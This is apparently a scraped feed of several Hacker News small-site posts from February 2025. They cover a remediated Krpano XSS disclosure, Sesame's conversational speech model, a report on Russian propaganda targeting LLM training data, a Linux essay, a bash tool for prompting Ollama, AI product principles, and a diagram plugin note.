    Alongside my reporting mission, I reached out to Krpano’s developers to highlight the vulnerable implementation on their own website and raise concerns about the handling of the XML parameter. The library’s main developer, Klaus, responded promptly and professionally, taking my report seriously. Within a few weeks, he implemented a fix in version 1.22.4, restricting external resources from being loaded through the XML parameter—effectively closing off this attack vector.

    Big kudos to Klaus 👑

    360XSS: How to Fix It?

    🔍 Identify all instances of Krpano on your website.
    ⬆️ Update to the latest version 1.22.4.
    ❌ Set the passQueryParameter configuration to false.
    🔍 Scan for SEO Poisoning – Find and remove infected pages via Google Search Console.

    Stay Safe 💪🏻
    ]]>
    https://olegzay.com/360xss/ hacker-news-small-sites-43198536 Thu, 27 Feb 2025 21:09:14 GMT
    <![CDATA[Crossing the uncanny valley ofconversational voice]]> thread link) | @jasonpeacock
    February 27, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

    To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a

    single-stage model, thereby improving efficiency and expressivity. The second is our

    evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second-stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation; semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden even with a small model slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

    Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 31 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

    Pronunciation correction sentence is a recording, all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43198509 Thu, 27 Feb 2025 21:06:01 GMT
    <![CDATA[Report on Russian efforts to flood LLM/AI models with pro-Russian content]]> thread link) | @avs733
    February 27, 2025 | https://www.americansunlight.org/updates/new-report-russian-propaganda-may-be-flooding-ai-models | archive.org

    Click here to read the report.

    Click here to read the press release.

    Click here to access the database.

    It may be tempting to consider Russian influence campaigns in the United States and other democratic countries as merely an afterthought, given the chaos and uncertainty that Donald Trump’s second presidency is causing. But his reelection–and the growing influence of Russia-friendly, far right parties worldwide–only makes these campaigns more relevant. The Trump administration is actively undoing protections against foreign kleptocratic dealings and disinformation in the United States while the Trump-led United States is apparently siding with authoritarian Russia against democratic states like Ukraine. These actions are essentially putting a for-sale sign on the American information space and dealing a devastating blow to democratic and information resilience worldwide.

    The chaos of the second Trump administration also serves as a distraction that allows Russian influence campaigns to continue to grow unchecked. The American Sunlight Project’s latest report explores the newest expansion of the so-called “Pravda network,” a collection of web pages and social media accounts that aggregate pro-Russia propaganda around the world. This expansion explicitly targets the United States, among dozens of other new targets that include countries in Africa, Asia, Europe, and North America. The network is also newly targeting prominent heads of state, international organizations, and commonly spoken languages.

    More concerning than the network’s geographic expansion are its growing capabilities and how other information operations could copy the Pravda network’s model in the future. The network itself is a highly centralized system of largely automated propaganda aggregation, translation, and sharing across the network’s massive footprint. ASP estimates that the network is producing at least 3 million articles of pro-Russia propaganda per year, a number that does not include the network’s activity on X (Twitter), Telegram, Bluesky, and VK. Given the past growth of this network, this rate is likely to increase.

    Such a large network poses several risks. Both the general public and prominent leaders are more likely to see the network’s content–which is laden with harmful, anti-democratic disinformation–given how pervasive it is. This means that audiences might be more likely to believe and share this content, and the content is more likely to be wittingly or unwittingly laundered by more legitimate sources to even bigger audiences. Pravda network articles have already been cited on Wikipedia, for example, and Trump’s recent accusation that Ukraine was somehow responsible for the war clearly shows that influential figures in U.S. politics readily repeat Russian disinformation.

    The Pravda network also appears to be set up to flood large-language models with pro-Kremlin content. Past research shows that all ten major AI chatbots can reproduce Russian disinformation in response to certain prompts, suggesting that their training data contained Russian disinformation to begin with. The Pravda network is rapidly churning out content without clear intention of building actual human readership on its poorly designed websites means that it may be aiming to land its content in LLM training data. Without more robust safeguards on training datasets and LLMs alike, the risk that the network’s content is eventually parroted by AI chatbots and other LLMs is very large–regardless of the network’s intent.

    Thus, we enter a new chapter of Russian information operations. Democracies not only have to contend with a chaotic U.S. government on the backdrop of ever-flourishing Russian disinformation; advancements in technology such as AI also promise to turbocharge foreign influence campaigns in unforeseen ways. Major players in government, civil society, and the private sector must act to ensure transparency and oversight of AI training models and prevent the most harmful effects of this new era of information operations, and the public should understand that the internet they are navigating becomes more misleading by the minute.

    ]]>
    https://www.americansunlight.org/updates/new-report-russian-propaganda-may-be-flooding-ai-models hacker-news-small-sites-43198383 Thu, 27 Feb 2025 20:51:36 GMT
    <![CDATA[Linux Changes Lives]]> thread link) | @jethronethro
    February 27, 2025 | https://catecheticconverter.com/im-probably-going-to-be-that-guy-to-some-of-you | archive.org

    I’m probably going to be “that guy” to some of you. That guy who discovers something new to him and then integrates it into his personality and won’t shut up about it until something else comes along to take it’s place. I’ve been that guy kind of all my life, to be honest (ask my friends). My current “that guy” thing is the Linux distribution (I restrained myself from saying “distro”) known as Ubuntu and it has, in a small way, changed my life.

    So here’s the deal. I’ve been an Apple guy since at least 2006, after an obsession with Sony products (and the building of a PC just after high school). My first ever Apple product was an iPod, the one with the touch wheel. I was so enamored with the design (as I was with the late-90s clear Macs) that I decided to finally purchase a Mac computer for myself. After my beloved Sony Vaio laptop was stolen from my apartment in college, I went almost a year without a computer (living fearfully and carefully with my entire life on a thumb drive that traveled with me everywhere—this was well before cloud storage). With money bequeathed to me from my grandmother after her funeral, I purchased that ubiquitous white plastic Apple iMac laptop that everyone had (except for the kids who had the black pro model). And I used it all through the rest of college and my seminary education. It was chipped and scratched by the time I got a good deal on a 27-inch iMac with an Intel processor, thanks to a friend who worked at the Apple Store. This was during my first year of marriage, before kids and when my wife had a very well-paying accounting job for a major firm (while I worked as the lowest-paid priest in my diocese). In addition to that, I was fully integrated into the Apple ecosystem: iPhones, iPads, Apple Watches. I read Steve Jobs’ biography (which still sits on my shelf and I pick up to read on occasion even nowadays). I was maybe “that guy” about Apple for a time.

    What I love(d) about Apple is the seriousness they took with regards to design. They aimed to make beautiful products. And not only were they beautiful, they simply worked.

    I hate Windows. I pretty much hate everything Microsoft. But I really hate Windows. I especially hated that Windows lied to me. Like when I went to delete software, just sending it to the recycle bin was not enough. You had to track down stuff in the registry after running an uninstaller, just to make sure it was all gone. What blew my mind with my first Mac was that deleting software was as simple as moving it to “trash.” Then emptying that trash. Then there was the refinement. Pages offered crisp-looking documents with a range of beautiful fonts. The icons for minimizing and closing windows in MacOS looked like candied jewels. The physical hardware of the machines were minimalist works of art. No company aside from Braun or Dyson seemed to be focused on the connection between function and form quite like Apple. And that philosophy carried over into the software side as well. Jobs was correct in recognizing that personal computing was only going to take off if things were designed with an eye toward intuition. He hung around with guys like Steve Wozniak and Bill Gates, guys who viewed computers in a vein similar to HAM radios. But Jobs knew that he’d have to remove personal computers from the realm of hobbyists and offer a product that seemed “finished” if people were going to shell out loads of money in order to use that product. And the proof is right in front of us: the Macintosh played an instrumental role in the adoption of personal computers and Apple sits as the most valuable company in the world.

    Reading Walter Isaacson’s biography of Steve Jobs reveals something many many people have noted: Apple struggles without Steve Jobs. When Apple fired Jobs, they floundered as a company and got too spread-out, offering products that no one seemed interested in purchasing. Jobs’ return brought with it the foundation of success that the company rides today, but looking at Apple these days and you can see that they’ve not really been able to overcome Jobs’ death (compounded by the losing of Jony Ive from the design side of things as well). Jobs’ philosophy of ensuring that these consumer products simply “work” has morphed instead into an approach of spoon-feeding applications and gradually locking people into the Apple ecosystem, seemingly more to keep them from leaving than any real benefit to remaining.

    Take my beloved Pages, for instance. Every time I’ve updated that program (which has gradually become more and more like a mobile app than a proper word processor) I’ve lost fonts that I used and certain settings are gone or buried for reasons that don’t make a whole lot of sense to anyone but the engineers at Apple. Then there’s the planned obsolescence. Which, I get. Maintaining old hardware and software requires people and thus incurs costs on diminishing returns and all of that. But Apple continues to have their hardware and software locked up, which results in these beautiful products becoming seen as disposable, discardable, and furthering an ugly and environmentally catastrophic sense of consumerism.

    Jobs seemed to hold the view that a computer should not insist upon itself. The computer, for him, is a tool toward a different end, not an end in itself. Increasingly, Apple feels like they’re making products for the sake of the product, and making changes to those products that feel insistent and not like the catalyst for liberation that Jobs envisioned in his dad’s garage all those years ago.

    Which brings me, finally, to Ubuntu.

    So that mid-2011 Mac I spoke about? I still have it and use it as my “home” computer. When I was called to be the priest of Saint Mary’s in Honolulu, the private school I had been chaplain to gave Saint Mary’s two refurbished Macs as a gift. Both of them the same year and model of my home computer. That was in March of 2020. One of the machines I appropriated for use as my office computer (because I didn’t have one at the church when I arrived). Shortly after the move, I started noticing that my home machine was running slow. I had a ton of stuff on there, so it wasn’t that unexpected. Then the office machine started chugging and I kept getting notices that my OS was no longer able to receive security updates, etc. It was becoming clear that I needed to buy a new computer—or two.

    My parish is not big. I do not make a ton of money. So the idea of asking the parish to purchase me a new computer felt selfish. I was not about to keep apologizing to folks about the leaky roof while logging onto a brand new iMac (I really liked the mint green one). Plus there was the added element of what I’d said above about Apple, that the newer Macs were harder to repair and treated as more “disposable” (they glued the motherboard to the screen!). Conventional wisdom (that I picked up when I was working at EB Games in 2000 and part of the “PC Master Race”) was that a Windows machine should last about five years and a Mac between seven and ten, depending on use-level. These machines were hitting fourteen years of age, so old that I could not AirDrop from my iOS devices on them. So, it was time.

    Then, Trump happened. Again. And suddenly all the big tech stuff changed in my eyes. Beating big tech felt like both a Christian responsibility and a patriotic need. I thought back to the early chapters of Steve Jobs’ biography and how he articulated the role tech can play in personal liberation. So I decided that I needed to learn Linux. I actually checked out Linux For Dummies from the library. In the course of my reading I learned that not only does Linux run really great on older Macs, but Ubuntu in particular.

    This all means that I found myself in a position to try something new, something that would maybe inject new life into my computers—as well as me and my relationship with technology. I dug out an old external drive and got to work on creating a bootable USB drive for experimenting with Ubuntu on Mac. It was a bit more complicated than I expected. One computer basically forgot that it was able to access a WiFi network and so I had to create the drive on a separate same model Mac. I couldn’t use Etcher to get things going (the Mac was too old), so I had to learn to use the Terminal on Mac (which I’ve ever only used extremely sparingly; reminded me of DOS back in the day, which helped when I built my own PC, or when I had to do stuff with BIOS). I had two machines going, plus my iPad for instructions. I felt like I was hacking the Gibson. Once I got the bootable drive set up, I plugged it into the relevant machine, restarted it in order to boot from the drive, and was blown away at how refined and pretty Ubuntu looked—while feeling a deep sense of satisfaction that I got it to work at all. I fell in love almost immediately and so I wiped the memory of the machine and installed Ubuntu as the operating system, running it like it was a fresh computer.

    I’m writing this on that machine, using LibreOffice. I love it so much that I get excited to come to work just to use this computer.

    Running Ubuntu on this Mac has had an immense impact on my relationship with computers in just the few weeks I’ve had it. Not only does it feel like I’m using a completely brand new computer, it feels rebellious, like I’m in some sort of special club. When I check out apps online and I see that it has Linux support, I feel like I’m part of an inside joke that only cool people get.

    Linux feels rebellious to me. I’m sure there are folks who run servers that do not feel this way. But for someone that lives among the normies, to whom it’s either Windows or MacOS, Android or iPhone, this feels counter-cultural. And it feels empowering, like I get to decide when my technology is out of date. I mean, I’m writing this on a nearly fifteen year old machine (which still looks beautiful), using a twenty-five year old Pro Keyboard (the one with the midnight blue clear plastic buttons—the peak of personal computing design—I got it for like ten bucks at a thrift store). There’s plenty of life left in these things and they do not deserve to be relegated to trash heaps. Indeed, the aesthetic beauty of these products is enduring and Linux ensures that they are still functionally useful.

    There’s also a spiritual dimension to this as well. In not letting a mega-corporation or three make my technology decisions for me, I am asserting my own self-worth. I am also experiencing a sort of revival, what Saint Paul refers to as the transforming of one’s mind, in opposition to being “conformed to the ways of this world.” The tools and the knowledge to use them is out there. It just takes a little time and effort to acquire it. It doesn’t need to be doled out to me from on high. Rather, it’s all around us and among us, even within us. And this fact is utterly liberating to know.

    It’s weird to say, I guess, but this little operating system has had a huge impact on me. Linux changes lives.

    The Rev. Charles Browning II is the rector of Saint Mary’s Episcopal Church in Honolulu, Hawai’i. He is a husband, father, surfer, and frequent over-thinker. Follow him on Mastodon and Pixelfed.

    ]]>
    https://catecheticconverter.com/im-probably-going-to-be-that-guy-to-some-of-you hacker-news-small-sites-43198260 Thu, 27 Feb 2025 20:40:12 GMT
    <![CDATA[Show HN: Prompting LLMs in Bash scripts]]> thread link) | @chilipepperhott
    February 27, 2025 | https://elijahpotter.dev/articles/prompting_large_language_models_in_bash_scripts | archive.org

    I’ve been ex­per­i­ment­ing with us­ing LLMs lo­cally for gen­er­at­ing datasets to test Harper against. I might write a blog post about the tech­nique (which I am grandiosely call­ing LLM-assisted fuzzing”), but I’m go­ing to make you wait.

    I’ve writ­ten a lit­tle tool called ofc that lets you in­sert Ollama into your bash scripts. I think it’s pretty neat, since it (very eas­ily) lets you do some pretty cool things.

    For ex­am­ple, you can swap out the sys­tem prompt, so if you want to com­pare be­hav­ior across prompts, you can just toss it in a loop:

    #!/bin/bash
    
    subreddits=("r/vscode" "r/neovim" "r/wallstreetbets")
    
    
    for subreddit in "${subreddits[@]}"; do
      echo "++++++++ BEGIN $subreddit ++++++++"
      ofc --system-prompt "Assume the persona of a commenter of $subreddit" "What is your opinion on pepperjack cheese."
      cat
    done
    

    Or, you can in­struct a model to prompt it­self:

    ofc --system-prompt "$(ofc "Write a prompt for a large language model that makes it think harder. ")" "What is a while loop?"
    

    ofc is in­stal­lable from ei­ther crates.io or its repos­i­tory.

    cargo install ofc --locked
    
    
    cargo install --git https://github.com/elijah-potter/ofc --locked
    
    ]]>
    https://elijahpotter.dev/articles/prompting_large_language_models_in_bash_scripts hacker-news-small-sites-43197752 Thu, 27 Feb 2025 19:46:55 GMT
    <![CDATA[The Hard Thing About Building AI Applications]]> thread link) | @cgwu
    February 27, 2025 | https://www.runllm.com/blog/the-hard-thing-about-building-ai-applications | archive.org

    This week, we shared our vision for the AI Support Engineer and key features that set it apart from generic AI tools. The AI Support Engineer we built is the result of two years of deep thinking about what it takes to develop a great Native-AI application experience. And we’ve also learned by using a lot of other AI apps, some of which became our favorites.

    What we’ve found is that the best experiences with AI usually happen when things just work — when the system figures something out before we do or when work happens behind the scenes. It’s a kind of magic that most products don’t deliver. But we also know that making AI feel effortless takes relentless attention to detail and quality — how the product makes you feel when you’re using it. And that’s honestly been one of the harder aspects of this journey.

    As we’ve built RunLLM — and to keep things straight for ourselves — we developed a set principles about what makes a great AI product. Many of the features we’ve shared this week stem from these principles. We’re proud of the progress we’ve made, and — if you’ll indulge us — we’re excited to share those with you.

    Our Principles for Building AI-Native Apps

    1. Anticipates Needs – Delivers what you need before you ask

    One of the most magical things that modern AI enables (which simply wasn’t possible before) is the ability to figure things out for you. By default, a AI product shouldn’t ask you to fill out forms or spell out every detail. It should ask you to just point it in the right direction, and it should anticipate your needs. Instead of waiting for you to constantly tell it what to do, it should just work.

    2. Aware of Limits – Knows when to stop and ask for help

    No one trusts a system (or a person) that pretends to know everything. The best AI recognizes when it’s uncertain, quantifies its confidence, provides citations, and escalates complex issues to the right experts. With both humans and AI, credibility comes from knowing when to seek input rather than bluffing through uncertainty. Because AI is doing so much behind the scenes, it needs to build trust with you by being transparent and calling out when it doesn’t know something.

    3. Clarifies Complexity – Can simplify info without losing depth

    Information overload is a problem that AI is well-suited to solve when designed correctly. The best AI products distill a high volume of information into something manageable by highlighting what matters and presenting information in a way that is clear, concise, and actionable. The key is balance: provide a simple answer at first but allow users to go deeper when necessary. AI needs to know how to “speak in headlines” but then also be ready to give you all the details.

    4. Shoulders Work – Does the heavy lifting so you don’t have to

    What AI applications are ultimately about is doing work for you. The most popular example of this today is OpenAI’s Deep Research: You give it an area to explore, go focus on other things, and come back to find a full-fledged report ready for you. AI applications may not be ready to take on months-long projects (yet?), but they certainly should be able to work unsupervised.

    Our Principles Applied to RunLLM

    Each of these core principles has directly influenced the way we’ve been building (and will continue to build) RunLLM.

    1. Seamless Onboarding — Anticipates Needs

    Building an onboarding experience that figures things out for you was one of the most fun things we’ve done at RunLLM. For most of the past year, adding data to RunLLM required filling out a long form — what kind of data you were ingesting, where your data lived, which URLs to crawl, and so on. Once you set up an assistant, learning about all the things RunLLM did required having, well, a person tell you.

    Now, all you have to do is point RunLLM at the URL for your docs and it figures out the rest. Within a couple minutes, your assistant is ready to go, and RunLLM will teach you about itself along the way — how to add more data, how to teach it when it gets something wrong, and how to deploy it for your users to use.

    2. Aware of Limits — Knows When to Stop and Ask for Help

    Most users today are (rightly) skeptical of AI. We’ve all seen LLMs hallucinate. At RunLLM, trust is a top priority — especially because our audience relies on accurate technical answers in high-stakes situations. Choosing the wrong technology, misconfiguring a system, or struggling to get started can cost developers time, money, and even customers. Here’s how we try to build trust:

    1. We’re not afraid to say “I don’t know.” RunLLM isn’t afraid to tell you it doesn’t have the answer to a question — better to say I don’t know than to lose trust.
    2. We tell you how confident we are (and why). Each answer is framed to communicate our confidence and also comes with citations, so you can verify our work if needed.
    3. We learn from our mistakes. When you correct RunLLM, it remembers the right answer — so it won’t make the same mistake twice.
    4. We ask for help. If RunLLM can’t answer a question, it seamlessly loops in a person — logging unresolved issues, surfacing them in Slack, and learning from your answer.
    3. Insights That Surface What Matters — Clarifies Complexity

    RunLLM processes thousands of customer conversations each week. Buried in those interactions are valuable insights — but no team can manually sift through them all. That’s why RunLLM structures this data into clear, actionable insights, identifying patterns, surfacing key issues, and highlighting opportunities — whether for your team to act on or for RunLLM to handle automatically.

    We aim to proactively separate signal from noise. We start by automatically categorizing all questions by topic and generating brief summaries, so you don’t have to read hundreds of conversations per-topic. On top of that, we help you uncover customer use cases, track trends in user behavior, identify documentation gaps, and surface feature requests — all in a way that’s immediately actionable.

    4. A Capable AI Support Engineer — Shoulders the Work

    AI products are ultimately about delivering work so that you don’t have to. RunLLM is always working in the background — whether it’s to help your customers be successful or to help you understand what your customers are doing. This unlocks your time to focus on your highest value customer relationships.

    To make your customers successful, we don’t stop at a single answer. We look for alternatives, search the internet, and execute code — all with the goal of maximizing the likelihood that we solve the problem at hand. Simultaneously, we’re always looking for ways to help you improve. The insights mentioned above are periodically updated for you, and RunLLM will proactively flag documentation issues and suggest updates.

    In Pursuit of AI Magic

    When done well, AI can feel like magic. The best AI isn’t just useful — it’s intuitive, responsive, and even delightful. Few things make us happier than hearing a customer ask, “How did it figure that out?!”

    Of course, the answer isn’t magic — it’s thoughtful design, relentless iteration, and a deep focus on user experience. Creating seamless AI requires rethinking product design from the ground up and constantly refining how the system anticipates, adapts, and assists.

    We’ve learned a lot through this process, and we hope sharing these principles helps others think about what makes AI feel more natural, intuitive, and effective.

    And we’re just getting started — with more background data analysis, smarter suggestions, and even more proactive insights on the way.

    ]]>
    https://www.runllm.com/blog/the-hard-thing-about-building-ai-applications hacker-news-small-sites-43197656 Thu, 27 Feb 2025 19:35:59 GMT
    <![CDATA[What I Use to Make Diagrams]]> thread link) | @cubbic
    February 27, 2025 | https://cubbk.de/posts/drawio-vscode-plugin/ | archive.org

    There’s tools like Miro and Lucidchart which are very good for making diagrams and have cool multiplayer(gen z talk) features but with 2 major drawbacks:

    • separate from code
    • not free

    The payed part can be ignored even though it’s a pain to switch tools every new company and not being to use it in personal projects but the separation from code does not cut it for me.

    I’ve been using draw.io and exporting pngs for quite a while but recently I discovered a vscode plugin that fixed it all for me.

    Draw.io Integration

    A vscode plugin that lets you make a diagram.drawio.svg file(notice the .svg), edit it as a drawio diagram and just save it back!

    It saves it as an svg without having to export anything and it still contains the diagram emmbeded into the svg so it can be eddited again! No more manual exports or sharing links to miro!

    drawio

    I like it and will continue using it further.

    Thinks to consider:

    • unofficial extension
    • there is multiplayer but much more annoying to set up
    • your manager/po is likely not keen on installing any vscode
    ]]>
    https://cubbk.de/posts/drawio-vscode-plugin/ hacker-news-small-sites-43197622 Thu, 27 Feb 2025 19:32:40 GMT
    <![CDATA[The False Summit – When 90% done becomes 50%]]> thread link) | @jermaustin1
    February 27, 2025 | https://jeremyaboyd.com/post/the-false-summit | archive.org

    A friend of mine is always calling me out for never finishing anything, and never writing anything, and never responding to him after 5 PM or on weekends. I'm a bad friend, and I have accepted that, but he's always asking me about whatever my latest hyperfixation project is. Did I finish it; did I write a post about it; did I release it to the app store. The question is triggering because the answer is almost always "no".

    Why is it almost always no, though?

    I'm a BIG proponent of therapy, and not just because I paid untold thousands for my wife to get her masters in psychology. It has also helped me identify patterns in my behavior and where I developed them. Over my many years of therapy, I'm still searching for why I hate finishing things. And it's not just software projects, it is everything.

